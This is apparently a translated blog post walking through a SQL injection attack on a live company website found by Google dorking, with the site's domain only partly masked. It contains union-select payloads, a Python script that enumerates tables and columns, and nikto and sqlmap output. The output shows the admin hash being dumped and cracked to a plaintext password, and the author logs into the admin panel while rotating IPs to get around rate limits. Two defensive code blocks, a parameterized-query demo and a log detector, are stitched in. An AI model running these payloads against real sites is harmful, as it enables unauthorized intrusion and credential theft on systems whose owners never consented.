Most of the sites I find with SQL injection are PHP sites. I guess it is simply because PHP's share is so large, and building a site with it is convenient and fast. It is the same story as iOS versus Android, where Android is always the one considered insecure, or Windows versus Linux and macOS, where Windows is always the one considered insecure: the market share explains it.
To find sites with injection flaws I searched Google with the Google hacking syntax: 公司 inurl:".php?id=" (公司 means "company").
That matches pages whose title ends in 公司 and whose URL contains .php?id=. Let's run the search and pick the first result.
First append a ' to test. The page errors out immediately, and from the error message this is a Linux server with a MySQL database.
Continue testing with the HackBar plugin: no error. Test again with the following: error. That tells us this field is an integer type.
?id=37 and '1'='1'
Why an integer? Suppose the field were a string; then the SQL statement would have to end with a ', so the statement would look like the following, and it errors:
select * from 表 where id='37 and '1'='1''
If it is an integer, the statement looks like this and does not error, so the field is an integer:
select * from 表 where id=37 and '1'='1'
So this is an integer-type injection point. Keep testing.
Use order by to determine the number of columns in the current table: order by 25 gives no error and order by 26 errors, so the current table has 25 columns.
Use a union query to find which column positions are rendered on the page: positions 2 and 10 are output.
and 1=2 has to be added every time so that the original query's condition is false and only the rows of the appended query are displayed:
?id=37 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
Replacing positions 2 and 10 with database() and user() makes the page print the database name and the account name with its host. The database is bdm266490221_db.
Now we can query MySQL's built-in information_schema database:
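The integer-versus-string reasoning above, and the order by and union probes that follow from it, reproduced against an in-memory SQLite table beside the validated, parameterized form that stops them. This is an added example, not code from the post; the table name `about`, its two columns and the sample rows are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for the page's 25-column table: two columns
# are enough to show the behaviour (hypothetical table and column names).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE about (id INTEGER, title TEXT)")
conn.execute("INSERT INTO about VALUES (37, 'About us'), (38, 'Contact')")


def vulnerable_int_context(raw_id):
    """What the page infers the site does: the parameter lands in an integer
    context, so `?id=37 and '1'='1'` becomes `... where id=37 and '1'='1'`."""
    return conn.execute("SELECT id, title FROM about WHERE id=" + raw_id).fetchall()


def vulnerable_str_context(raw_id):
    """The string-context alternative the page rules out: the same input
    becomes `... where id='37 and '1'='1''`, which does not parse."""
    return conn.execute("SELECT id, title FROM about WHERE id='" + raw_id + "'").fetchall()


def probe(func, raw_id):
    """Run a probe and report rows or 'error', the two signals the page relies on."""
    try:
        return func(raw_id)
    except sqlite3.OperationalError:
        return "error"


def safe_lookup(raw_id):
    """Hardened form: validate the type, then bind the value instead of splicing
    it into the statement text; a probe gets neither rows nor a syntax error."""
    try:
        id_value = int(raw_id)
    except ValueError:
        return None  # anything that is not a bare integer is rejected
    return conn.execute("SELECT id, title FROM about WHERE id=?", (id_value,)).fetchall()


if __name__ == "__main__":
    for payload in ("37 and '1'='1'", "37 order by 2", "37 order by 3",
                    "37 and 1=2 union select 1,'injected'"):
        print(payload, "| int:", probe(vulnerable_int_context, payload),
              "| str:", probe(vulnerable_str_context, payload),
              "| safe:", safe_lookup(payload))
```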
?id=37 and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.TABLES where TABLE_SCHEMA='bdm266490221_db' limit 0,1
This errors; most likely the ' character is being filtered, so convert the string to a hexadecimal literal.
Try again:
?id=37 and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.TABLES where TABLE_SCHEMA=0x2762646d3236363439303232315f646227 limit 0,1
Still nothing is displayed. Two things are worth noting here:
1. Characters such as ' and " may not be allowed; use the 0x hexadecimal form instead.
2. Other SQL may be appended after our statement; use -- to comment it out, so that limit 0,1 can be used to output the specified row.
So as things stand, where cannot be used to pick out exactly the table names of the bdm266490221_db database. I switched approaches and enumerated every table name together with its database directly with a script:
Python builds all the URLs, requests each one, and extracts the wanted information with a regular expression.
and 1=2 union select 1,TABLE_SCHEMA,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.TABLES limit 0,1
import re
import requests

# Enumerate information_schema.TABLES one row at a time by stepping LIMIT;
# the two displayed positions (2 and 10) carry TABLE_SCHEMA and TABLE_NAME.
for i in range(0, 1000):
    try:
        url = """http://www.***.com/about.php?id=37 and 1=2 union select 1,TABLE_SCHEMA,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.TABLES limit %d,%d""" % (i, i + 1)
        rsp = requests.get(url=url).text
        # Pull the two values out of the page's page_bt / page_text elements
        info = re.findall(r'(?:page_bt">)(.*)(?:<)|(?:page_text">)(.*)(?:<)', rsp)
        print(info, i)
    except Exception:
        print('error:%d' % i)
[('information_schema', ''), ('', 'CHARACTER_SETS')] 0
[('information_schema', ''), ('', 'COLLATIONS')] 1
[('information_schema', ''), ('', 'COLLATION_CHARACTER_SET_APPLICABILITY')] 2
[('information_schema', ''), ('', 'COLUMNS')] 3
[('information_schema', ''), ('', 'COLUMN_PRIVILEGES')] 4
[('information_schema', ''), ('', 'ENGINES')] 5
[('information_schema', ''), ('', 'EVENTS')] 6
[('information_schema', ''), ('', 'FILES')] 7
[('information_schema', ''), ('', 'GLOBAL_STATUS')] 8
[('information_schema', ''), ('', 'GLOBAL_VARIABLES')] 9
[('information_schema', ''), ('', 'KEY_COLUMN_USAGE')] 10
[('information_schema', ''), ('', 'PARTITIONS')] 11
[('information_schema', ''), ('', 'PLUGINS')] 12
[('information_schema', ''), ('', 'PROCESSLIST')] 13
[('information_schema', ''), ('', 'PROFILING')] 14
[('information_schema', ''), ('', 'REFERENTIAL_CONSTRAINTS')] 15
[('information_schema', ''), ('', 'ROUTINES')] 16
[('information_schema', ''), ('', 'SCHEMATA')] 17
[('information_schema', ''), ('', 'SCHEMA_PRIVILEGES')] 18
[('information_schema', ''), ('', 'SESSION_STATUS')] 19
[('information_schema', ''), ('', 'SESSION_VARIABLES')] 20
[('information_schema', ''), ('', 'STATISTICS')] 21
[('information_schema', ''), ('', 'TABLES')] 22
[('information_schema', ''), ('', 'TABLE_CONSTRAINTS')] 23
[('information_schema', ''), ('', 'TABLE_PRIVILEGES')] 24
[('information_schema', ''), ('', 'TRIGGERS')] 25
[('information_schema', ''), ('', 'USER_PRIVILEGES')] 26
[('information_schema', ''), ('', 'VIEWS')] 27
[('bdm266490221_db', ''), ('', 'gplat_book')] 28
[('bdm266490221_db', ''), ('', 'gplat_news')] 29
[('bdm266490221_db', ''), ('', 'gplat_newsclass')] 30
[('bdm266490221_db', ''), ('', 'gplat_newsclass2')] 31
[('bdm266490221_db', ''), ('', 'href')] 32
[('bdm266490221_db', ''), ('', 'job')] 33
[('bdm266490221_db', ''), ('', 'job_add')] 34
[('bdm266490221_db', ''), ('', 'lawyer_wenda')] 35
[('bdm266490221_db', ''), ('', 'user')] 36
[('', ''), ('', '')] 37
[('', ''), ('', '')] 38
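From the defender's side, the enumeration loop above leaves a very recognisable trace in the web server's access log: one client stepping LIMIT offsets on a single path, after the quote, order by and union probes. This added example (not code from the post) scans constructed combined-format log lines for the probe patterns used on this page and flags that stepping; the client address, timestamps and log lines are made up.

```python
import re
from urllib.parse import unquote_plus

# Signatures drawn from the probes used on this page: quoted tautology,
# order by N, union select, information_schema, hex literals, SLEEP().
SIGNATURES = {
    "quote_tautology": re.compile(r"'\s*\d+\s*'\s*=\s*'\s*\d+\s*'"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{8,}\b", re.I),
    "time_based": re.compile(r"\bsleep\s*\(", re.I),
}
LIMIT_RE = re.compile(r"\blimit\s+(\d+)\s*,\s*\d+", re.I)
# Combined log format: client ip ... "METHOD target HTTP/x" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample (RFC 5737 address, made-up timestamps), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/May/2019:16:10:16 +0800] "GET /about.php?id=37 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [28/May/2019:16:10:20 +0800] "GET /about.php?id=37%20and%20%271%27=%271%27 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [28/May/2019:16:10:31 +0800] "GET /about.php?id=37%20order%20by%2026 HTTP/1.1" 500 312',
    '203.0.113.5 - - [28/May/2019:16:11:02 +0800] "GET /about.php?id=37%20and%201=2%20union%20select%201,TABLE_SCHEMA,3,TABLE_NAME%20from%20information_schema.TABLES%20limit%200,1 HTTP/1.1" 200 5311',
    '203.0.113.5 - - [28/May/2019:16:11:03 +0800] "GET /about.php?id=37%20and%201=2%20union%20select%201,TABLE_SCHEMA,3,TABLE_NAME%20from%20information_schema.TABLES%20limit%201,2 HTTP/1.1" 200 5311',
    '203.0.113.5 - - [28/May/2019:16:11:04 +0800] "GET /about.php?id=37%20and%201=2%20union%20select%201,TABLE_SCHEMA,3,TABLE_NAME%20from%20information_schema.TABLES%20limit%202,3 HTTP/1.1" 200 5311',
    '203.0.113.5 - - [28/May/2019:16:11:40 +0800] "GET /about.php?id=37%20and%201=2%20union%20select%201%20from%20t%20where%20s=0x746573745f6462 HTTP/1.1" 200 5311',
]


def classify(line):
    """Parse one log line and report which probe signatures its query matches."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    decoded = unquote_plus(target)  # probes arrive URL-encoded (%20, %27, ...)
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))
    lm = LIMIT_RE.search(decoded)
    return {
        "ip": ip,
        "path": decoded.split("?", 1)[0],
        "status": int(status),
        "hits": hits,
        "limit_offset": int(lm.group(1)) if lm else None,
    }


def scan(lines, min_offsets=3):
    """Return the suspicious requests plus the (ip, path) pairs that stepped
    through at least min_offsets distinct LIMIT offsets: row-by-row dumping."""
    findings = [f for f in map(classify, lines) if f and f["hits"]]
    offsets = {}
    for f in findings:
        if f["limit_offset"] is not None:
            offsets.setdefault((f["ip"], f["path"]), set()).add(f["limit_offset"])
    stepping = [key for key, seen in offsets.items() if len(seen) >= min_offsets]
    return findings, stepping


if __name__ == "__main__":
    found, stepping = scan(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["status"], f["hits"], f["limit_offset"])
    print("row-by-row enumeration from:", stepping)
```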
These are the tables that exist in bdm266490221_db. user is probably the table holding account credentials, so next query its columns, again enumerating with the script.
[('bdm266490221_db', ''), ('', 'gplat_book')] 28
[('bdm266490221_db', ''), ('', 'gplat_news')] 29
[('bdm266490221_db', ''), ('', 'gplat_newsclass')] 30
[('bdm266490221_db', ''), ('', 'gplat_newsclass2')] 31
[('bdm266490221_db', ''), ('', 'href')] 32
[('bdm266490221_db', ''), ('', 'job')] 33
[('bdm266490221_db', ''), ('', 'job_add')] 34
[('bdm266490221_db', ''), ('', 'lawyer_wenda')] 35
[('bdm266490221_db', ''), ('', 'user')] 36
Continue by enumerating the table columns, querying the column names directly:
and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.COLUMNS limit 0,1
import re
import requests

# Same loop against information_schema.COLUMNS; positions 2 and 10 now carry
# COLUMN_NAME and TABLE_NAME.
for i in range(0, 1000):
    try:
        url = """http://www.***.com/about.php?id=37 and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.COLUMNS limit %d,%d""" % (i, i + 1)
        rsp = requests.get(url=url).text
        info = re.findall(r'(?:page_bt">)(.*)(?:<)|(?:page_text">)(.*)(?:<)', rsp)
        print(info, i)
    except Exception:
        print('error:%d' % i)
[('id', ''), ('', 'gplat_book')] 315
[('ip', ''), ('', 'gplat_book')] 316
[('title', ''), ('', 'gplat_book')] 317
[('content', ''), ('', 'gplat_book')] 318
[('times', ''), ('', 'gplat_book')] 319
[('stick', ''), ('', 'gplat_book')] 320
[('class', ''), ('', 'gplat_book')] 321
[('name', ''), ('', 'gplat_book')] 322
[('up_time', ''), ('', 'gplat_book')] 323
[('view', ''), ('', 'gplat_book')] 324
[('photo', ''), ('', 'gplat_book')] 325
[('email', ''), ('', 'gplat_book')] 326
[('userid', ''), ('', 'gplat_book')] 327
[('fid', ''), ('', 'gplat_book')] 328
[('id', ''), ('', 'gplat_news')] 329
[('title', ''), ('', 'gplat_news')] 330
[('path', ''), ('', 'gplat_news')] 331
[('class', ''), ('', 'gplat_news')] 332
[('sticky', ''), ('', 'gplat_news')] 333
[('times', ''), ('', 'gplat_news')] 334
[('clickNum', ''), ('', 'gplat_news')] 335
[('author', ''), ('', 'gplat_news')] 336
[('cchu', ''), ('', 'gplat_news')] 337
[('content', ''), ('', 'gplat_news')] 338
[('introduce', ''), ('', 'gplat_news')] 339
[('img', ''), ('', 'gplat_news')] 340
[('TitleFontColor', ''), ('', 'gplat_news')] 341
[('TitleFontType', ''), ('', 'gplat_news')] 342
[('issystem', ''), ('', 'gplat_news')] 343
[('classIndex', ''), ('', 'gplat_news')] 344
[('bigimg', ''), ('', 'gplat_news')] 345
[('views', ''), ('', 'gplat_news')] 346
[('url', ''), ('', 'gplat_news')] 347
[('files', ''), ('', 'gplat_news')] 348
[('seo_title', ''), ('', 'gplat_news')] 349
[('seo_description', ''), ('', 'gplat_news')] 350
[('seo_keywords', ''), ('', 'gplat_news')] 351
[('sort', ''), ('', 'gplat_news')] 352
[('indexview', ''), ('', 'gplat_news')] 353
[('id', ''), ('', 'gplat_newsclass')] 354
[('name', ''), ('', 'gplat_newsclass')] 355
[('href', ''), ('', 'gplat_newsclass')] 356
[('classIndex', ''), ('', 'gplat_newsclass')] 357
[('issystem', ''), ('', 'gplat_newsclass')] 358
[('id', ''), ('', 'gplat_newsclass2')] 359
[('fid', ''), ('', 'gplat_newsclass2')] 360
[('name', ''), ('', 'gplat_newsclass2')] 361
[('num', ''), ('', 'gplat_newsclass2')] 362
[('classIndex', ''), ('', 'gplat_newsclass2')] 363
[('issystem', ''), ('', 'gplat_newsclass2')] 364
[('id', ''), ('', 'href')] 365
[('title', ''), ('', 'href')] 366
[('href', ''), ('', 'href')] 367
[('img', ''), ('', 'href')] 368
[('href_img', ''), ('', 'href')] 369
[('href_order', ''), ('', 'href')] 370
[('id', ''), ('', 'job')] 371
[('ip', ''), ('', 'job')] 372
[('title', ''), ('', 'job')] 373
[('content', ''), ('', 'job')] 374
[('times', ''), ('', 'job')] 375
[('stick', ''), ('', 'job')] 376
[('class_id', ''), ('', 'job')] 377
[('name', ''), ('', 'job')] 378
[('up_time', ''), ('', 'job')] 379
[('view', ''), ('', 'job')] 380
[('photo', ''), ('', 'job')] 381
[('email', ''), ('', 'job')] 382
[('id', ''), ('', 'job_add')] 383
[('ip', ''), ('', 'job_add')] 384
[('title', ''), ('', 'job_add')] 385
[('content', ''), ('', 'job_add')] 386
[('times', ''), ('', 'job_add')] 387
[('stick', ''), ('', 'job_add')] 388
[('class_id', ''), ('', 'job_add')] 389
[('name', ''), ('', 'job_add')] 390
[('up_time', ''), ('', 'job_add')] 391
[('view', ''), ('', 'job_add')] 392
[('telephone', ''), ('', 'job_add')] 393
[('email', ''), ('', 'job_add')] 394
[('sex', ''), ('', 'job_add')] 395
[('birthday', ''), ('', 'job_add')] 396
[('marry', ''), ('', 'job_add')] 397
[('school', ''), ('', 'job_add')] 398
[('studydegree', ''), ('', 'job_add')] 399
[('specialty', ''), ('', 'job_add')] 400
[('gradyear', ''), ('', 'job_add')] 401
[('address', ''), ('', 'job_add')] 402
[('resumes', ''), ('', 'job_add')] 403
[('id', ''), ('', 'lawyer_wenda')] 404
[('ip', ''), ('', 'lawyer_wenda')] 405
[('title', ''), ('', 'lawyer_wenda')] 406
[('content', ''), ('', 'lawyer_wenda')] 407
[('times', ''), ('', 'lawyer_wenda')] 408
[('stick', ''), ('', 'lawyer_wenda')] 409
[('class_id', ''), ('', 'lawyer_wenda')] 410
[('name', ''), ('', 'lawyer_wenda')] 411
[('up_time', ''), ('', 'lawyer_wenda')] 412
[('view', ''), ('', 'lawyer_wenda')] 413
[('photo', ''), ('', 'lawyer_wenda')] 414
[('email', ''), ('', 'lawyer_wenda')] 415
[('company', ''), ('', 'lawyer_wenda')] 416
[('address', ''), ('', 'lawyer_wenda')] 417
[('answer', ''), ('', 'lawyer_wenda')] 418
[('id', ''), ('', 'user')] 419
[('name', ''), ('', 'user')] 420
[('pass', ''), ('', 'user')] 421
[('email', ''), ('', 'user')] 422
[('phone', ''), ('', 'user')] 423
[('times', ''), ('', 'user')] 424
[('up_time', ''), ('', 'user')] 425

[('xingb', ''), ('', 'user')] 426
[('adder', ''), ('', 'user')] 427
[('qianming', ''), ('', 'user')] 428
[('image', ''), ('', 'user')] 429
[('grade', ''), ('', 'user')] 430
[('admin', ''), ('', 'user')] 431
name and pass are very likely the account and password, so build the SQL in the page once more to inject:
[('name', ''), ('', 'user')] 420
[('pass', ''), ('', 'user')] 421
?id=37 and 1=2 union select 1,name,3,4,5,6,7,8,9,pass,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from bdm266490221_db.user
The page then prints admin and an encrypted-looking password string. I did not know what encryption it was; later sqlmap cracked it automatically and the password is 123321. So there should be an admin backend with account admin and password 123321.
Since we have credentials, there should be an admin URL. Use nikto -h url to scan and see whether anything turns up:
root@MiWiFi-R3L-srv:~# nikto -h http://www.***.com
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 60.205.33.**
+ Target Hostname: www.***.com
+ Target Port: 80
+ Start Time: 2019-05-28 16:24:58 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ Retrieved x-powered-by header: PHP/5.2.17
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 12 item(s) reported on remote host
+ End Time: 2019-05-28 16:27:50 (GMT8) (172 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The scan turned up a path that could be the backend, and trying it confirmed it is the admin page. After logging in with the credentials the next step would be getting a webshell, but you still cannot just go around doing damage. No wonder people say: learn pentesting well and you'll sit in a cell until you're old.
This site limits repeated access from the same public IP (after a while it becomes unreachable), so during testing I had to keep switching IPs...
Reply hackbar to the official account to get the browser plugin; it makes SQL injection testing much easier, because typing into the browser's URL bar is painful as the symbols get URL-encoded every time.
Afterwards I ran a sqlmap scan, and its results agreed:
[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://mt.com/about.php?id=37 --dbs --delay 0.5
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:10:16 /2019-05-28/
[16:10:16] [INFO] resuming back-end DBMS 'mysql'
[16:10:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=37 AND 2853=2853
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)
Type: UNION query
Title: Generic UNION query (NULL) - 25 columns
Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:10:17] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:10:17] [INFO] fetching database names
[16:10:17] [INFO] used SQL query returns 2 entries
[16:10:17] [INFO] resumed: 'information_schema'
[16:10:17] [INFO] resumed: 'bdm266490221_db'
available databases [2]:
[*] bdm266490221_db
[*] information_schema
[16:10:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.yuebooemt.com'
[*] ending @ 16:10:17 /2019-05-28/
So it revealed two database names:
available databases [2]:
[*] bdm266490221_db
[*] information_schema
2. Next dump the table names. Now that we know the database name, specify it directly:
python sqlmap.py -u http://www.**.com/about.php?id=37 -D bdm266490221_db --tables --delay 0.5
[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 -D bdm266490221_db --tables --delay 0.5
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:12:48 /2019-05-28/
[16:12:48] [INFO] resuming back-end DBMS 'mysql'
[16:12:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=37 AND 2853=2853
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)
Type: UNION query
Title: Generic UNION query (NULL) - 25 columns
Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:12:49] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:12:49] [INFO] fetching tables for database: 'bdm266490221_db'
[16:12:49] [INFO] used SQL query returns 9 entries
[16:12:49] [INFO] resumed: 'gplat_book'
[16:12:49] [INFO] resumed: 'gplat_news'
[16:12:49] [INFO] resumed: 'gplat_newsclass'
[16:12:49] [INFO] resumed: 'gplat_newsclass2'
[16:12:49] [INFO] resumed: 'href'
[16:12:49] [INFO] resumed: 'job'
[16:12:49] [INFO] resumed: 'job_add'
[16:12:49] [INFO] resumed: 'lawyer_wenda'
[16:12:49] [INFO] resumed: 'user'
Database: bdm266490221_db
[9 tables]
+------------------+
| user |
| gplat_book |
| gplat_news |
| gplat_newsclass |
| gplat_newsclass2 |
| href |
| job |
| job_add |
| lawyer_wenda |
+------------------+
[16:12:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.y***.com'
[*] ending @ 16:12:49 /2019-05-28/
It returned 9 table names; judging by the names, user is the one we want.
3. Dump the columns:
python sqlmap.py -u http://www.***.com/about.php?id=37 -D bdm266490221_db -T user --columns --delay 0.5
[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.***.com/about.php?id=37 -D bdm266490221_db -T user --columns --delay 0.5
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:15:39 /2019-05-28/
[16:15:39] [INFO] resuming back-end DBMS 'mysql'
[16:15:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=37 AND 2853=2853
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)
Type: UNION query
Title: Generic UNION query (NULL) - 25 columns
Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:15:40] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:15:40] [INFO] fetching columns for table 'user' in database 'bdm266490221_db'
[16:15:40] [INFO] used SQL query returns 13 entries
[16:15:40] [INFO] resumed: 'id','int(6)'
[16:15:40] [INFO] resumed: 'name','varchar(60)'
[16:15:40] [INFO] resumed: 'pass','varchar(60)'
[16:15:40] [INFO] resumed: 'email','varchar(60)'
[16:15:40] [INFO] resumed: 'phone','varchar(14)'
[16:15:40] [INFO] resumed: 'times','datetime'
[16:15:40] [INFO] resumed: 'up_time','datetime'
[16:15:40] [INFO] resumed: 'xingb','varchar(2)'
[16:15:40] [INFO] resumed: 'adder','varchar(8)'
[16:15:40] [INFO] resumed: 'qianming','varchar(100)'
[16:15:40] [INFO] resumed: 'image','varchar(70)'
[16:15:40] [INFO] resumed: 'grade','varchar(12)'
[16:15:40] [INFO] resumed: 'admin','int(2)'
Database: bdm266490221_db
Table: user
[13 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| adder | varchar(8) |
| admin | int(2) |
| email | varchar(60) |
| grade | varchar(12) |
| id | int(6) |
| image | varchar(70) |
| name | varchar(60) |
| pass | varchar(60) |
| phone | varchar(14) |
| qianming | varchar(100) |
| times | datetime |
| up_time | datetime |
| xingb | varchar(2) |
+----------+--------------+
[16:15:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.y**mt.com'
[*] ending @ 16:15:40 /2019-05-28/
4. Dump the contents; user and pass look like the account and password:
[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.***.com/about.php?id=37 -D bdm266490221_db -T user -C "user,pass" --dump --delay 0.5
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:18:43 /2019-05-28/
[16:18:43] [INFO] resuming back-end DBMS 'mysql'
[16:18:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=37 AND 2853=2853
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)
Type: UNION query
Title: Generic UNION query (NULL) - 25 columns
Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:18:44] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:18:44] [INFO] fetching entries of column(s) '`user`, pass' for table 'user' in database 'bdm266490221_db'
[16:18:44] [INFO] used SQL query returns 1 entry
[16:18:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:18:45] [INFO] fetching number of column(s) '`user`, pass' entries for table 'user' in database 'bdm266490221_db'
[16:18:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:18:45] [INFO] retrieved: 1
[16:18:48] [INFO] retrieved:
[16:18:50] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[16:19:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[16:19:09] [INFO] retrieved: 4d9012b4a77a9524d675dad27c3276ab5705e5e8
[16:22:07] [INFO] recognized possible password hashes in column 'pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[16:22:42] [INFO] writing hashes to a temporary file '/tmp/sqlmapvAfQDC24962/sqlmaphashes-9Y2NbI.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[16:22:45] [INFO] using hash method 'sha1_generic_passwd'
[16:22:45] [INFO] resuming password '123321' for hash '4d9012b4a77a9524d675dad27c3276ab5705e5e8'
Database: bdm266490221_db
Table: user
[1 entry]
+---------+---------------------------------------------------+
| user | pass |
